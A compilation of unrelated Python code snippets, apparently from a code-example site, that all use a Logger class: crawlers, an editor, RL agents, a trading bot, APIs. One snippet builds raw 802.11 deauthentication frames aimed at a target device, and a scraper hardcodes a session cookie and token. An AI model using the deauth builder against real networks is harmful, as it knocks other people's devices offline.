def boot(self, links):
    """Feed each root link into the pipeline and wait for it to drain.

    One root link is fully processed (sublinks and images included)
    before the next one is started, because all three work queues are
    joined after every put.
    """
    for link in links:
        self.rootlink_queue.put(link)
        Logger.write('Put rootlink:', link)
        # Block until this root link and everything it spawned are done.
        for queue in (self.rootlink_queue, self.sublink_queue, self.image_queue):
            queue.join()
 def load_config_file(filename='config_resource.json'):
     """Load and return the JSON configuration stored in *filename*.

     Parameters
     ----------
     filename : str
         Path of the UTF-8 encoded JSON configuration file.

     Returns
     -------
     The deserialized JSON content (typically a dict).
     """
     Logger.write('Loading config file:', filename)
     # The 'with' block closes the file; the explicit file.close() the
     # original carried inside it was redundant and has been removed.
     with open(filename, 'r', encoding='utf8') as file:
         config_json = json.load(file)
         Logger.write('Load success, content: \n' + json.dumps(config_json))
     return config_json
 def printFib(n):  # write Fibonacci series up to n
     """Print every Fibonacci number strictly less than n, one per line."""
     Logger.printStart()
     a, b = 0, 1
     while b < n:
         # The original had a Python-2 style trailing comma after
         # print(b); in Python 3 that just builds a throwaway 1-tuple.
         print(b)
         a, b = b, a + b
     Logger.printOk()
Beispiel #4
0
 def execute(self):
     """Persist the editor's current text to the user's file and log it."""
     content = self.form.txtEdit.toPlainText()
     writer = FileWriter(self.form.userfile)
     writer.open()
     writer.writeLine(content)
     writer.close()
     Logger().log("saveText()")
Beispiel #5
0
    def execute(self):
        """Ask the user for confirmation and, if granted, clear the editor."""
        answer = QMessageBox.question(self.form, 'Message',
                                      "Are you sure to clear text?",
                                      QMessageBox.Yes | QMessageBox.No,
                                      QMessageBox.No)
        # Guard clause: anything other than an explicit Yes is a no-op.
        if answer != QMessageBox.Yes:
            return
        self.form.txtEdit.setText('')
        Logger().log("clearText()")
Beispiel #6
0
 def execute(self):
     """Read the whole user file into the editor widget and log the action.

     The text is accumulated in a list and joined once, instead of the
     original repeated string concatenation (quadratic in the worst case).
     """
     filereader = FileReader(self.form.userfile)
     filereader.open()
     parts = []
     while True:
         temp_str = filereader.readLine()
         if not temp_str:  # falsy value signals end of file
             break
         parts.append(temp_str)
     self.form.txtEdit.setText(''.join(parts))
     Logger().log("readTextFromFile()")
     filereader.close()
Beispiel #7
0
class BaseAgent:
    """Common plumbing for Blackjack agents: env wiring, Q-table, plotting.

    The default environment is now created lazily inside __init__; the
    original evaluated gym.make(...) in the signature, which runs once at
    import time and shares a single env across every instance.
    """

    def __init__(self, env=None, log_dir=None):
        """Set up the environment, Q-table, logger and (for BlackjackEnv)
        a run() shim used by the tournament helper.

        Parameters
        ----------
        env : gym env, optional
            Environment to use; a fresh 'Blackjack-v0' is created when None.
        log_dir : str, optional
            Directory the Logger writes performance data to.
        """
        self._env = env if env is not None else gym.make('Blackjack-v0')
        # Q-table: maps observation -> per-action value vector.
        self.q = defaultdict(lambda: np.zeros(self._env.action_space.n))
        self.policy = None
        self.eval_policy = None
        self.log_dir = log_dir
        self.logger = Logger(self.log_dir, debug=False)
        # Adding run function to Gym env
        if isinstance(self._env, BlackjackEnv):
            def run(is_training=False):
                observation = self._env.reset()
                while True:
                    if (self.eval_policy is None) or \
                            (observation not in self.eval_policy):
                        # No evaluated policy for this state: act randomly.
                        # (The original closed over the 'env' parameter
                        # here; it now consistently uses self._env.)
                        action = np.random.choice(
                            np.arange(self._env.action_space.n))
                    else:
                        action = np.argmax(self.eval_policy[observation])
                    observation, reward, done, _ = self._env.step(action)
                    if done:
                        return _, np.asarray([int(reward)])

            self._env.run = run
            self._env.player_num = 1

    def train(self):
        """Train the agent; subclasses override this."""
        pass

    def play(self, num_plays=NUM_HANDS):
        """Play num_plays hands and return the tournament results."""
        return tournament(self._env, num_plays)

    def plot_policy(self, save=False, save_path=None):
        """Plot the trained policy; requires self.policy to be set."""
        assert self.policy is not None
        plot_policy(self.policy, save=save, save_path=save_path)

    def plot_value_function(self):
        """Plot the value function derived from the Q-table."""
        assert self.policy is not None
        plot_value_function(self.q)

    def plot(self, algo_name):
        """Plot this agent's logged learning curve."""
        self.logger.plot(algo_name)

    @staticmethod
    def plot_avg(base_dir, algo_name):
        """Plot the curve averaged over the NUM_EXP runs under base_dir."""
        csv_path_list = [f"{base_dir}/{j}/performance.csv" for j in
                         range(NUM_EXP)]
        label_names = [f"{algo_name}_{j}" for j in range(NUM_EXP)]
        plot_avg(csv_path_list, label_names, f"{algo_name}_Average",
                 f"{base_dir}/avg_fig.png")
Beispiel #8
0
class DBHandler:
    """Thin wrapper that opens MySQL connections and logs failures."""

    def __init__(self):
        self.logger = Logger(logname="/var/log/houseData.log", loglevel=1, logger="houseDataLogger").getLogger()

    def get_db_conn(self, db_name, user_name, password):
        """Return a MySQLdb connection to *db_name* on localhost:3306.

        On any MySQL error the problem is logged and the process exits
        with status -1 (behaviour kept from the original).
        """
        conn = None
        try:
            conn = MySQLdb.connect(
                host="localhost", user=user_name, passwd=password, db=db_name, port=3306, charset="utf8"
            )
            return conn
        # 'except MySQLdb.Error, e' is Python-2-only syntax; the 'as'
        # form works on Python 2.6+ and Python 3.
        except MySQLdb.Error as e:
            self.logger.error("Mysql Error %d: %s" % (e.args[0], e.args[1]))
            sys.exit(-1)
class Audio(object):
    """Small helper that owns a role-named Logger and a creation timestamp."""

    def __init__(self, verbose=False, log_output="stderr", **kwargs):
        self._verbose = verbose
        self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
        self._time_str = str(int(time.time()))

    def log(self, m, header_color="", color=""):
        """Forward a message to the logger, stamped with our creation time."""
        self._logger.log(m, header_color=header_color, color=color, time_str=self._time_str)

    def _reset_term(self, dummy_a, dummy_b):
        """Signal-handler-shaped callback that resets the terminal."""
        call(["reset", "-I"])
 def __init__(self, type, apache_id):
     """Build the JIRA identifier and browse URL for one Apache issue.

     'type' shadows the builtin but is kept for caller compatibility.
     """
     self.type = type
     self.apache_id = str(apache_id)
     self.full_id = '{}-{}'.format(self.type.upper(), self.apache_id)
     self.url = 'https://issues.apache.org/jira/browse/' + self.full_id
     self.data = ""
     self.logger = Logger(__name__)
Beispiel #11
0
    def grab(path, image_url, file_name=None):
        """Download image_url into *path*; return False for disallowed types.

        The file name defaults to the last URL segment and gets an
        extension derived from the response's MIME type. Network errors
        are logged rather than raised.
        """
        try:
            name = file_name or image_url.split('/')[-1]
            response = requests.get(image_url)
            content_type = response.headers['content-type']
            if content_type not in ImageLoader.ALLOWED_TYPES:
                return False
            # e.g. 'image/png' -> 'png'
            extension = content_type.split('/')[-1]
            target = os.path.join(path, '%s.%s' % (name, extension))
            write_file(target, response.content)
        except exceptions.RequestException as error:
            Logger.record_log('Occurred Exception:', error)
Beispiel #12
0
    def __init__(self, os_properties):
        """Store OS properties, reserve an emergency buffer, build the logger."""
        self.os_properties = os_properties
        # MicroPython: pre-allocate so exceptions can still be reported
        # when the heap is exhausted.
        micropython.alloc_emergency_exception_buf(100)
        self.logger = Logger(self.os_properties['log_level'])
Beispiel #13
0
    def run(self):
        """Detect drift velocities for the whole video, resuming if possible.

        Appends to the raw drifts file, starting right after the last
        frame already present (or at frame 5 for a fresh file).
        """
        stepSize = self.step_size()
        # Was a Python-2 print statement; the rest of this method already
        # uses the print() function.
        print("using stepSize: " + str(stepSize))

        folderStruct = self.__folderStruct

        if not folderStruct.fileExists(folderStruct.getRawDriftsFilepath()):
            self.__createNewRawFileWithHeaderRow(folderStruct)

        logger = Logger.openInAppendMode(folderStruct.getRawDriftsFilepath())

        rawDriftData = DriftRawData(folderStruct)
        maxFrameID = rawDriftData.maxFrameID()
        # Resume after the last processed frame, else start at frame 5.
        if maxFrameID > 1:
            startFrameID = maxFrameID + stepSize
        else:
            startFrameID = 5

        print("starting processing from frame", startFrameID)

        velocityDetector = VelocityDetector()
        videoStream = VideoStream(folderStruct.getVideoFilepath())
        velocityDetector.runLoop(startFrameID, stepSize, logger, videoStream)

        logger.closeFile()
  def __init__(self,
      audio_player=AUDIO_PLAYER,
      pdf_viewer=PDF_VIEWER,
      output_directory=OUTPUT_DIR,
      tmp_directory=TMP_DIRECTORY,
      clean=False,
      verbose=False,
      log_output="stderr",
      **kwargs):
    """Set up logging, the viewers, and the output/tmp directories.

    output_directory is created when it does not exist yet; a failure to
    create it is reported via the logger rather than raised.
    """
    self._verbose = verbose
    self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
    self._time_str = str(int(time.time()))

    self.audio_player = audio_player
    self.pdf_viewer = pdf_viewer
    self.output_directory = output_directory
    # Bug fix: the original assigned the module constant TMP_DIRECTORY
    # here, silently ignoring the tmp_directory parameter.
    self.tmp_directory = tmp_directory
    if not os.path.isdir(self.output_directory):
      try:
        os.mkdir(self.output_directory)
      except OSError as e:
        self.log("The path {} already exists.\n"
          "Clear that path or specify a different directory name.".format(self.output_directory)
        )
    if clean:
      self.filename_clean()  # for debugging
class LianjiaHisStatisticsData:
	"""Fetches Lianjia historical-statistics pages via urllib2."""

	def __init__(self):
		self.logger = Logger(logname='/var/log/houseData.log', loglevel=1, logger="houseDataLogger").getLogger()

	def get_response(self, url):
		"""GET *url* with a browser User-Agent; return the response or None.

		The header avoids the 403 Forbidden the site returns to the
		default urllib2 agent. Errors are logged and swallowed.
		"""
		# add header to avoid get 403 fobbiden message
		i_headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'}
		request = urllib2.Request(url, headers = i_headers)

		try:
			response = urllib2.urlopen(request)
		# Python-2-only 'except Exception, e' replaced by the 'as' form,
		# which also works on Python 2.6+.
		except Exception as e:
			self.logger.error(str(e) + '\n')
			return None

		return response
Beispiel #16
0
    def __createNewRawFileWithHeaderRow(self, folderStruct):
        """Create the raw drifts file from scratch with just the header row."""
        header = VelocityDetector.infoHeaders()
        logger = Logger.openInOverwriteMode(folderStruct.getRawDriftsFilepath())
        logger.writeToFile(header)
        logger.closeFile()
 def __init__(self, verbose=False, log_output="stderr", **kwargs):
     """Remember verbosity, build a class-named logger, stamp creation time."""
     self._verbose = verbose
     self._logger = Logger(log_output=log_output, role=self.__class__.__name__)
     self._time_str = str(int(time.time()))
    def __init__(self, type):
        """Load every JIRA dump under data/<TYPE>/, keeping only error lines.

        self.lines maps each file path to the list of its (stripped)
        lines that mention 'Caused by' or 'ERROR'.
        """
        self.lines = {}
        logger = Logger(__name__)

        for path in glob.glob("data/" + type.upper() + "/*"):
            logger.debug("Loading JIRA: " + path)
            self.lines[path] = []
            with open(path, 'r') as handle:
                kept = [raw.strip() for raw in handle
                        if raw.find('Caused by') >= 0 or raw.find('ERROR') >= 0]
                self.lines[path] = kept
                logger.debug("JIRA: %s loaded with %s lines", path, str(len(kept)))
Beispiel #19
0
	def __init__(self, name, ticker, period, live_mode, periods_needed=200):
		"""
		- name: string, the name of the bot
		- ticker: string, the ticker formatted like that: ASSET1/ASSET2
		- period: string, the period on which the loop will be set, and the resolution of the candles
		- live_mode: bool, should we launch the live loop and start trading live
		- periods_needed: int, the number of candles you will get every loop, optional
		"""
		self.live_mode = live_mode
		self.name = name
		self.ticker = ticker
		self.period_text = period
		self.periods_needed = periods_needed
		self.offset_seconds = 10
		# 'x not in y' instead of 'not x in y' (same truth value, clearer).
		if (self.name not in config.get_config()):
			print("❌ Cannot instantiate bot: no config entry")
			exit(1)
		self.config = config.get_config()[self.name]
		if ('capitalAllowed' not in self.config):
			print("❌ Cannot instantiate bot: no 'capitalAllowed' property")
			exit(1)
		try:
			self.logger = Logger(self.name, live_mode)
		# Narrowed from a bare 'except:' so Ctrl-C is not intercepted;
		# the original error is still re-raised after the hint.
		except Exception:
			print("❌ Cannot connect to the log DB, are you sure it's running?")
			raise
		if (self.live_mode):
			self.data = Data(self.name)
		else:
			self.data = Data(self.name + "-test")
		self.exchange = Exchange(self.logger, self.data, self.config['capitalAllowed'], live_mode, self.ticker, self.period_text)
		try:
			self.period = period_matching[period]
		# Only an unknown period key should trigger the hint below.
		except KeyError:
			print("Available periods: 1m, 3m, 5m, 15m, 30m, 1h, 2h, 3h, 4h, 1d, 1w")
			raise
		self.logger.log("ℹ️", f"Bot {self.name} started with a period of {period}")
		self.logger.log("ℹ️", f"Capital allowed: {self.config['capitalAllowed']}%")
		self.setup()
		if (self.live_mode):
			self.preloop()
Beispiel #20
0
 def __init__(self, env):
     """
     Parameters
     ----------
     env : str
         the environment that the current instance is running
     """
     print("[ENDPOINTS] Initializing...")
     # initialize libraries
     self._env = env
     # DB handle built from the env and the class-level worker config;
     # the logger writes through it.
     self._db = DB(self._env, self._workers)
     self._logger = Logger(self._db, self._env)
     self._crypto = Crypto()
     # initialize Flask
     self._app = Flask(__name__)
     # Custom encoder so project-specific types serialize to JSON.
     self._app.json_encoder = CustomJSONEncoder
     self._api = Api(self._app)
     # Authorization check runs before every request, bookkeeping after.
     self._app.before_request(self.detectAuthorization)
     self._app.after_request(self.finishRequest)
     # Register each configured endpoint class under its URL.
     for url in self._endpoints: self.addResource(self._endpoints[url], url)
     print("[ENDPOINTS] Done.")
Beispiel #21
0
    def __init__(self, env=None, log_dir=None):
        """Set up the env, Q-table, logger and (for BlackjackEnv) a run() shim.

        The original default 'env=gym.make(...)' was evaluated once at
        import time and shared between instances; it is now created
        lazily per instance, which is backward compatible for callers.
        """
        self._env = env if env is not None else gym.make('Blackjack-v0')
        # Q-table: maps observation -> per-action value vector.
        self.q = defaultdict(lambda: np.zeros(self._env.action_space.n))
        self.policy = None
        self.eval_policy = None
        self.log_dir = log_dir
        self.logger = Logger(self.log_dir, debug=False)
        # Adding run function to Gym env
        if isinstance(self._env, BlackjackEnv):
            def run(is_training=False):
                observation = self._env.reset()
                while True:
                    if (self.eval_policy is None) or \
                            (observation not in self.eval_policy):
                        # Unknown state: pick a random action. (The original
                        # closed over the 'env' parameter; use self._env.)
                        action = np.random.choice(
                            np.arange(self._env.action_space.n))
                    else:
                        action = np.argmax(self.eval_policy[observation])
                    observation, reward, done, _ = self._env.step(action)
                    if done:
                        return _, np.asarray([int(reward)])

            self._env.run = run
            self._env.player_num = 1
Beispiel #22
0
def dqn_run_experiments():
    """Run NUM_EXP independent DQN training runs on Blackjack and plot them.

    Each run gets its own seed, its own log directory under DQN_RES_DIR
    and its own learning-curve plot; an averaged plot is produced last.
    """
    for run_idx in range(NUM_EXP):
        # Paired training/evaluation environments sharing one seed.
        env = rlcard.make('blackjack', config={'seed': run_idx})
        eval_env = rlcard.make('blackjack', config={'seed': run_idx})

        memory_init_size = 100  # transitions stored before learning starts
        train_every = 1         # train the agent every step
        log_dir = f"{DQN_RES_DIR}/{run_idx}"

        # Same agent plays in both environments.
        agent = DQNAgent('dqn',
                         action_num=env.action_num,
                         replay_memory_init_size=memory_init_size,
                         train_every=train_every,
                         state_shape=env.state_shape,
                         mlp_layers=[128, 256, 512],
                         debug=True)
        env.set_agents([agent])
        eval_env.set_agents([agent])

        # Records the learning curve for this run.
        logger = Logger(log_dir, debug=True)

        for episode in range(DQN_TRAINING_DURATION):
            # Generate one episode and feed its transitions to the agent.
            trajectories, _ = env.run(is_training=True)
            for transition in trajectories[0]:
                agent.feed(transition)

            # Periodically evaluate against the evaluation environment.
            if episode % EVALUATE_EVERY == 0:
                logger.log_performance(env.timestep, tournament(eval_env, EVALUATE_NUM_OF_HANDS)[0])

        logger.plot(f"DQN_{run_idx}")
    BaseAgent.plot_avg(DQN_RES_DIR, "DQN")
    def __init__(self):
        """
            Initializes and sets required default global variables by
            collecting metadata from information.yaml
        """
        # YAML handler; the large width keeps long lines from being
        # wrapped when config is dumped (presumably ruamel.yaml — confirm).
        self.ru_yaml = YAML()
        self.ru_yaml.width = 4096
        self.logger_object = Logger()
        self.webex_wrapper = WebexNotifierWrapper()
        self.logger = logging.getLogger('chatbot_logger')
        self.logger.info("Starting default initialization...")
        self.webex_auth_headers = {'content-type': 'application/json'}
        try:
            # Collecting metadata from information.yaml
            with open('information.yaml', 'r') as ifh:
                self.doc = yaml.safe_load(ifh)

                # Getting Webex Teams Room details
                self.webex_url = str(
                    self.doc["webex_teams_details"]["webex_url"])
                self.webex_room_id = str(
                    self.doc["webex_teams_details"]["webex_room_id"])

                # Getting Webex Teams Bot details
                self.auth_token = str(
                    self.doc["webex_teams_details"]["auth_token"])
                self.webex_bot_name = str(
                    self.doc["webex_teams_details"]["webex_bot_name"])

            # Setting Webex connectivity parameters
            self.webex_auth_headers[
                'authorization'] = 'Bearer ' + self.auth_token
            self.webex_auth_headers['Accept'] = 'application/json'
            # Removing '+ "&max=1"' for now from webex_teams_get_url bcoz of
            # the webex list messages API issue -- including max parameter
            # impacts the sort order of the message results when bot calls
            # list messages api
            self.webex_teams_get_url = self.webex_url + "?mentionedPeople=me" \
                                       + "&roomId=" + self.webex_room_id

            self.logger.info("Default initialization complete!!!")
        # Broad catch is a deliberate start-up boundary: any config problem
        # is logged instead of crashing the bot.
        except Exception as e:
            self.logger.error("Error -- {}".format(e))
#!/usr/bin/env python
# encoding: utf-8

import common
from lib.Logger import Logger
from lib.Config import Config
from lib.PTT import PTT

# NOTE(review): calling __new__() on an instance is unusual — presumably
# lib.Logger defines a custom __new__ that returns the underlying logger;
# confirm against lib/Logger.py.
logger = Logger('h4_invitation_notifier_ptt').__new__()

# BBS credentials and the upcoming meetup date from the shared config.
config = Config()
ID = config['bbs']['user']
PASSWORD = config['bbs']['pass']
PartyDate = common.thisThursday()

# Post target and content (the invite body is pulled from wikidot).
board = 'Linux'
subject = 'HackingThursday 固定聚會 (%s)' % PartyDate
content = common.html2txt(common.get_wikidot_content_body('http://www.hackingthursday.org/invite'))

if __name__ == '__main__':
    ptt = PTT()

    # Each step only logs on success; a failure falls through silently.
    if ptt.login(ID, PASSWORD):
        logger.info('login ptt')

    if ptt.enter(board):
        logger.info('enter %s board' % board)

    if ptt.post(subject, content):
        logger.info('post article')
Beispiel #25
0
 def getDeauthFrame(ap, target):
     """Build a raw 802.11 deauthentication frame from *ap* to *target*.

     The payload is a big-endian 2-byte reason code (1 = unspecified).
     """
     # Fixed the 'deauh' typo in the original log message.
     Logger.log('Sending deauth from {} to {}'.format(ap.mac, target.mac))
     deauth_frame = struct.pack('!H', 1)  # reason code, network byte order
     return Radiotap802_11.getRadiotapHeader() + Deauth.getDot11(
         ap.mac, target.mac) + deauth_frame
#!/usr/bin/env python
# encoding: utf-8

import common
from lib.Logger import Logger
from lib.Config import Config
from lib.Facebook import Facebook, Graph

# NOTE(review): calling __new__() on an instance is unusual — presumably
# lib.Logger defines a custom __new__ that returns the underlying logger;
# confirm against lib/Logger.py.
logger = Logger('h4_create_fb_event').__new__()

# Facebook credentials and target group from the shared config.
config = Config()
username = config['facebook']['username']
password = config['facebook']['password']
facebook_group_id = config['facebook']['group_id']

# Event copy and schedule for this week's Thursday meetup.
this_thursday = common.thisThursday()
title = 'HackingThursday固定聚會(%s)' % this_thursday
description = "地點:伯朗咖啡 (建國店)\n地址:台北市大安區建國南路一段 166 號\n(捷運忠孝新生站三號出口,沿忠孝東路走至建國南路右轉)\n\nWhat you can do in H4 :\n1. Code your code.\n2. Talk about OS, Programming, Hacking skills, Gossiping ...\n3. Meet new friends ~\n4. Hack and share anything !\n\nSee details :\nhttp://www.hackingthursday.org/\n\nWeekly Share :\nhttp://sync.in/h4"
start_time = '%sT07:30:00-0400' % this_thursday
end_time = '%sT10:00:00-0400' % this_thursday


def check_token():
    """Return a valid Facebook access token from the config, if any.

    NOTE(review): the invalid-token branch below ends right after
    constructing the Facebook() client — the refresh logic appears
    truncated here, so the function falls off the end and returns None
    in that case; confirm against the original script.
    """
    graph = Graph(config['facebook']['access_token'])

    if graph.getUID():
        logger.info('valid token')
        return config['facebook']['access_token']
    else:
        logger.info('invalid token, try get new one')
        fb = Facebook()
class ApacheJiraParser:
    """Download an Apache JIRA issue page and extract its exception text."""

    def __init__(self, type, apache_id):
        # 'type' shadows the builtin; kept for caller compatibility.
        self.type = type
        self.apache_id = str(apache_id)
        self.full_id = self.type.upper() + '-' + self.apache_id
        self.url = 'https://issues.apache.org/jira/browse/' + self.full_id
        self.data = ""
        self.logger = Logger(__name__)

    def parse(self):
        """Fetch the issue page and keep its description when it mentions
        an Exception or 'Caused by'; returns self for chaining."""
        self.logger.info("Retrieving JIRA: %s", self.url)

        buffer = StringIO()
        c = pycurl.Curl()
        c.setopt(c.URL, self.url)
        c.setopt(c.WRITEFUNCTION, buffer.write)
        c.perform()
        c.close()

        content = str(
            BeautifulSoup(
                buffer.getvalue(),
            'html.parser'
            ).find(id='descriptionmodule')
        )
        self.logger.info("JIRA retrieved")

        if content is None or content == 'None' or content.strip() == "":
            self.logger.info('No description was found for ID: %s', self.full_id)
        elif re.search(".*Exception.*", content) is None and re.search(".*Caused by.*", content) is None:
            self.logger.info('No Exception or Cause By found for ID: %s', self.full_id)
        else:
            # strip HTML tags
            tag_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
            # NOTE(review): cgi.escape was removed in Python 3.8;
            # html.escape is the replacement if this ever runs on 3.x.
            self.data = cgi.escape(tag_re.sub('', content))
            self.logger.info("Striping HTML tags")

        return self

    def write(self):
        """Write the extracted text to data/<type>/<FULL-ID>; no-op if empty."""
        if not self.data:
            self.logger.info('No data was found for ID: %s, skipping writing file..', self.full_id)
            return

        # 'with' guarantees the file is closed even if write() raises
        # (the original used bare open()/close()).
        with open("data/" + self.type.lower() + '/' + self.full_id, "w") as text_file:
            text_file.write(self.data)
Beispiel #28
0
#!/usr/bin/env python
# author: samren
import logging
import traceback
import unittest
import HTMLTestRunner
import time
from lib.Logger import Logger
from testcases.cases_login_logout.admin_login_logout import Bugfree管理员登录退出

if __name__ == '__main__':
    logger = Logger('./log/logger.log', logging.INFO)
    logging.info("本次测试开始执行,以下是详细日志")
    try:
        # Build a suite and load every test method of the login/logout case.
        suite = unittest.TestSuite()
        loader = unittest.TestLoader()
        suite.addTests(loader.loadTestsFromTestCase(
            Bugfree管理员登录退出))
        # 'with' closes the HTML report file even if the runner raises;
        # the original left fp open.
        with open(
                'reports/report_bugfree_{0}.html'.format(
                    time.strftime("%Y-%m-%d %H-%M-%S")), 'wb') as fp:
            runner = HTMLTestRunner.HTMLTestRunner(
                stream=fp, title='Bugfree的测试报告', description='Bugfree的所有测试用例执行细节')
            runner.run(suite)
        logging.info("测试顺利结束^_^ ")
    except Exception:
        # print_exc() writes the traceback to stderr, while format_exc()
        # returns it as a string for the log file.
        traceback.print_exc()
        logging.error(traceback.format_exc())
        logging.error("测试异常终止")
Beispiel #29
0
class LianjiaDealData:
	"""Scrapes Lianjia deal listings into rows and builds xlwt cell styles."""

	def __init__(self):
		self.logger = Logger(logname='/var/log/houseData.log', loglevel=1, logger="houseDataLogger").getLogger()

	def set_style(self, name, height, bold=False):
		"""Build an xlwt cell style with the given font name and height.

		'bold' is accepted for interface compatibility but unused (it was
		commented out in the original as well).
		"""
		style = xlwt.XFStyle()

		# create font for style
		font = xlwt.Font()
		font.name = name  # e.g. 'Times New Roman'
		font.size = 10
		font.color_index = 4
		font.height = height

		style.font = font

		return style

	def get_deal_data(self, soup):
		"""Extract deal rows from a parsed listings page.

		Walks every 'info-panel' div and picks fields by their position in
		the div's string sequence; only rows that end up with exactly 9
		columns are kept. Returns the list of 9-column rows.
		"""
		# row index
		n = 0
		# list of rows to insert into the db
		values = []

		for item_name in soup.findAll('div', {'class': 'info-panel'}):
			self.logger.info('Collecting %s row' % n)
			# str index
			j = 0
			# cloumn index
			m = 0
			# flag for data from other agent
			f = False
			# array to get the column value
			arr = (2, 8, 11)
			# len of item_name.strings
			k = 0
			for str in item_name.strings:
				k = k + 1

			# short panels carry fewer columns
			if k < 14:
				arr = (k-6, k-3)

			value = []
			for str in item_name.strings:
				if j == 0:
					tmp = str.split(' ')
					l = 0
					while l < len(tmp):
						# 71平米 --> 71 (strip non-digits from the area field)
						if l == 2:
							value.append(re.sub('\D', '', tmp[l]))
						else:
							value.append(tmp[l])
						# update column index to next column
						m = m + 1
						l = l + 1
				elif j == 1 and str == u'历史成交,暂无详情页':
					f = True
					arr = (k-6, k-3)
				elif j == 1 or (j == 2 and f):
					tmp = str.split('/')
					l = 0
					while l < len(tmp) - 1:
						value.append(tmp[l])
						# update column index to next column
						m = m + 1
						l = l + 1
					if f:
						value.append('')
						m = m + 1
				elif j == 2 and k < 14:
					value.append('')
					m = m + 1
				elif j == k - 8:
					# pad a bare year-month date with a day component
					if len(str) == 7:
						str = str + '.01'

					value.append(str)
					m = m + 1
				elif j in arr:
					value.append(str)
					# update column index to next column
					m = m + 1
				# update str index to next column
				j = j + 1
			# only complete 9-column rows are kept
			if len(value) == 9:
				values.append(value)
			# update row index to the next row
			n = n + 1
		self.logger.info('%s rows data has been collected; the length of list stores the collected data is %s' % (n, len(values)))
		self.logger.info('the collected data is: %s' % values)

		return values

	def get_response(self, url):
		"""GET *url* with browser headers and a session cookie; None on error."""
		# add header to avoid get 403 fobbiden message
		i_headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0',
					'Cookie': 'lianjia_uuid=2ebbfb89-6086-41ba-8c8b-06299a4ef5c8; lianjia_token=1.0092e5f86f1e8105f63d6d6fd4d79d9738'}
		request = urllib2.Request(url, headers = i_headers)

		try:
			response = urllib2.urlopen(request)
		# Python-2-only 'except Exception, e' replaced by the 'as' form,
		# which also works on Python 2.6+.
		except Exception as e:
			sys.stderr.write(str(e) + '\n')
			return None

		return response
Beispiel #30
0
    def simulation():
        """
        Function to install handlers on the /simulation path. This allows for
        requesting simulation data or starting a new simulation.

        Parameters
        ----------
        POST:

            servers: list
                List containing configurations for a server pool as dicts.
                { capacity: int, size: int, kind: string }
                For example, { size: 10, capacity: 10, kind: 'regular' }.

            process: list
                List specifying how a process should go (from server to server).
                This should contain a sequence of server kinds.
                For example, ["regular", "balance", "pay"].

            runtime: int
                Runtime of the simulation (defined by simpy package).

        Returns
        -------
        GET: dict
        POST: int
        """
        if request.method == "POST":

            # nonlocal use of the simulation count
            nonlocal simc

            # increment the simulation count
            simc += 1

            # we need a new environment which we can run.
            environment = Environment()

            # we need a server pool
            servers = MultiServers()

            # iterate over all of the servers that need to be configured that
            # we received from the client
            for kind in request.form['kinds'].split(','):

                # append a new server pool to the multiserver system
                servers.append(
                    Servers(environment,
                            size=int(request.form['size']),
                            capacity=int(request.form['capacity']),
                            kind=kind.strip()))

            # Get the current date and time to append to the logger file name
            log_timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M")

            # now that we have an output dir, we can construct our logger which
            # we can use for the simulation
            name = "{0}_{1:04d}_{2}".format(file_prefix, simc, log_timestamp)
            logger = Logger(name, directory=LOG_PATH)

            # we also need a logger for all error events that happen in the simulation
            error_logger = Logger(f"error-{name}", directory=LOG_PATH)

            # Enter first line for correct .csv headers
            logger.info(
                'Time;Server;Message_type;CPU Usage;Memory Usage;Latency;Transaction_ID;To_Server;Message'
            )
            error_logger.info('Time;Server;Error type;Start-Stop')

            # we can use the logger for the simulation, so we know where all logs will be written
            environment.logger(logger)
            environment.logger(error_logger, type="error")

            # we need a new form of seasonality
            seasonality = Seasonality(
                join(Seasonality_folder, Seasonality_file),
                max_volume=int(request.form['max_volume']))

            # now, we can put the process in the simulation
            Processor(environment,
                      servers,
                      seasonality=seasonality,
                      kinds=[
                          kind.strip()
                          for kind in request.form['process'].split(',')
                      ])

            # run the simulation with a certain runtime (runtime). this runtime is not equivalent
            # to the current time (measurements). this should be the seasonality of the system.
            # for example, day or week.
            environment.run(until=int(request.form['runtime']))

            # expose the id of the simulation
            return jsonify(simc)

        if request.method == "GET":

            if 'id' in request.args:
                logfile_id = "{:04d}".format(int(request.args.get('id')))

            # Scan the logfile directory
            list_of_files = glob.glob(os.path.join(LOG_PATH, 'log_*.csv'))

            # Return only the filename to get no errors with old functions
            log_filenames = [
                os.path.basename(filename) for filename in list_of_files
            ]

            if log_filenames:

                logfile_ids = [f.split('_')[1] for f in log_filenames]
                name_id_dict = dict(zip(logfile_ids, log_filenames))

                if logfile_id in logfile_ids:
                    # Logfile associated to given ID was successfully found
                    return jsonify({
                        "data": name_id_dict[logfile_id],
                        "message": "success"
                    })

                else:
                    # No logfile associated to given ID was found
                    return jsonify(
                        {"message": "No logfile (.csv) with given ID exists."})
            else:
                # No logfiles found (/logs is empty)
                return jsonify({"message": "No logfiles were found in /logs."})
import os, sys
from lib.HadoopBugDetector import HadoopBugDetector
from lib.ApacheJiraLoader import ApacheJiraLoader
from lib.Logger import Logger

logger = Logger(__name__)

supported_types = ["hive", "impala", "hdfs", "hbase"]
help_text = "Run command as:\n\n" \
            "python bug-detector.py <log_filename> <type>\n" \
            "where <type> is one of the following: " + ", ".join(supported_types) + "\n"

# Exactly two CLI arguments are required: the log file and the product type.
if len(sys.argv) != 3:
    # print(...) works on both Python 2 and 3; the original used
    # Python-2-only print statements.
    print("Expecting exactly two parameters\n")
    print(help_text)
    exit(1)

filename = sys.argv[1]
type = sys.argv[2]

if not os.path.isfile(filename):
    logger.error("File: %s does not exist", filename)
    exit(1)

detector = HadoopBugDetector(filename, ApacheJiraLoader(type))
detector.detect()

if len(detector.matchedJira) > 0:
    print("\n".join(detector.matchedJira))
else:
    print("No bugs detected")
Beispiel #32
0
class API:
    """ The Endpoints class

    Initializes the API portion of Bifrost. Also, takes care of authorizations.

    Attributes
    ----------
    _endpoints : dict
        the endpoint with the associated classes
    _version : str
        current version that the API runs on
    _logger : Logger
        the logger object for keeping track of traffic
    _db : DB
        the DB object for DB interfaces
    """

    # NOTE(review): these are class-level attributes shared by all instances
    # until __init__ rebinds them on the instance — confirm that a single
    # API instance per process is the intended usage.
    _endpoints = conf._endpoints
    _protected = conf._protected
    _workers = conf._workers

    _version = "v0"
    _logger = None
    _db = None
